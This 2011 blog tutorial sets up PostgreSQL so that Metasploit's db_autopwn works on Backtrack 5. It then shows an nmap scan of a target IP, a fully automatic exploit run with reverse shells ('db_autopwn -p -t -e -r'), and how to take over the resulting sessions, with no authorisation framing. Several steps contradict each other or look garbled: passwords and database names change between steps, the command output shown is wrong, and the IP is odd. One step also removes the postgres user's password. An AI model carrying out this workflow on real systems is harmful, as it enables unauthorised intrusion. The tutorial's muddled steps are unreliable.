Powered By Blogger

Wednesday, July 6, 2011

Metasploit Autopwn fix for Backtack 5

A lot of people are having trouble with Metasploit's Autopwn feature in Backtrack 5. It does require a little bit of tweaking to get going, below are a few steps to get you on your way.
I prefer to use postgreSQL over MySQL. This tutorial will only show how to properly configure Autopwn using postgreSQL.
First you must determine if you have postgres installed on your system. To do this type the following into a terminal:
ls /etc/init.d/ | grep post
postgresql

If you do not see "postgresql-8.4" you need to update or install postgresql. This can be done using the repositories:
apt-get install postgresql-8.4 postgresql-client-8.4
Now start the postgreSQL server by typing:
/etc/init.d/postgresql-8.4 start
NOTE: If you receive an error like;
"The PostgreSQL server failed to start. Please check the log output:"
You will need to disable SSL in the config file. To do this
nano /etc/postgresql/8.4/main/postgresql.conf
Look for the section like the one below:
Code:
# - Security and Authentication -
#authentication_timeout = 1min # 1s-600s

#ssl = true # (change requires restart) You simply comment it out like I did above with the "#" sign.
Now restart postgres:
/etc/init.d/postgresql-8.4 start
Now connect to the server and change the password to whatever you want:
sudo su postgres -c psql

ALTER USER postgres WITH PASSWORD 'yoursecretpasswd ';
(make sure to use the quotation marks when setting your password, here is a real life example)

ALTER USER postgres WITH PASSWORD 'swordfish ';\q sudo passwd -d postgres

sudo su postgres -c passwd
(Here you want to use the same password you used a few steps back)

Postgresql is all setup, now to Metasploit.
Start Metasploit by typing: msfconsole
Once Metasploit starts, type: db_driver
If the driver is already loaded it will give an ouput like below.
autopwn

If not, you will need to manaully load the driver by typing: db_driver postgresql
db_driver
Now all you have to do is connect to your database by typing (pentest is the name of the database):
db_connect postgres:mysecretpassword@127.0.0.1/metasploit autopwn

We are now connected and ready to run autopwn.
Run a nmap scan on the target:
db_nmap 192.68.12.99 To see all of autopwn's options type: db_autopwn
Finally launch the autopwn and let sit back and wait:
db_autopwn -p -t -e -r


After autopwn completes type:
sessions -l Any successfull attacks will result in a session. To interact with that session type:
sessions -i 1 (where 1 is the session number)
Posted by at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)